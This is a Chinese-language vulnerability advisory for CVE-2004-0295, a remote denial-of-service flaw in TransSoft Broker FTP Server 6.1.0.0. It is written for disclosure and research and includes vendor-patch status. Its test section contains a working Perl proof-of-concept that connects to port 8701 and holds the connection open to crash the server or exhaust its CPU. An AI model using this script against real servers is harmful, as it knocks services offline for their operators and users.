TransSoft Broker FTP Server远程拒绝服务攻击漏洞
发布日期:2004-02-17
更新日期:2004-02-26
受影响系统:TransSoft Broker FTP Server 6.1.0.0
描述:
BUGTRAQ ID:
9680
CVE(CAN) ID:
CVE-2004-0295
Broker FTP是一款FTP服务程序。
Broker FTP对部分不正常连接缺少正确处理,远程攻击者可以利用这个漏洞进行拒绝服务攻击。
通过连接FTP服务程序的消息服务程序(默认8701口)然后马上断开,可导致TsFtpSrv.exe程序发生异常。
另外通过连接服务程序,不发送任何数据,但保持连接打开,就可以使TsFtpSrv.exe消耗大量CPU时间,而造成拒绝服务。
<*来源:Beyond Security's SecurITeam (
expert@securiteam.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=107705346817241&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Beyond Security's SecurITeam (
expert@securiteam.com)提供了如下测试方法:
#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: pfdos.pl < host>
~;
exit;}
$ip=$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,8701,$target)){
select(S);
$|=1;
print $pstr;
sleep 100;
close(S);
} else { die("Can't connect...\n"); }
}
建议:
厂商补丁:
TransSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www[.]ftp-broker[.]com浏览次数:3121
严重程度:0(网友投票)
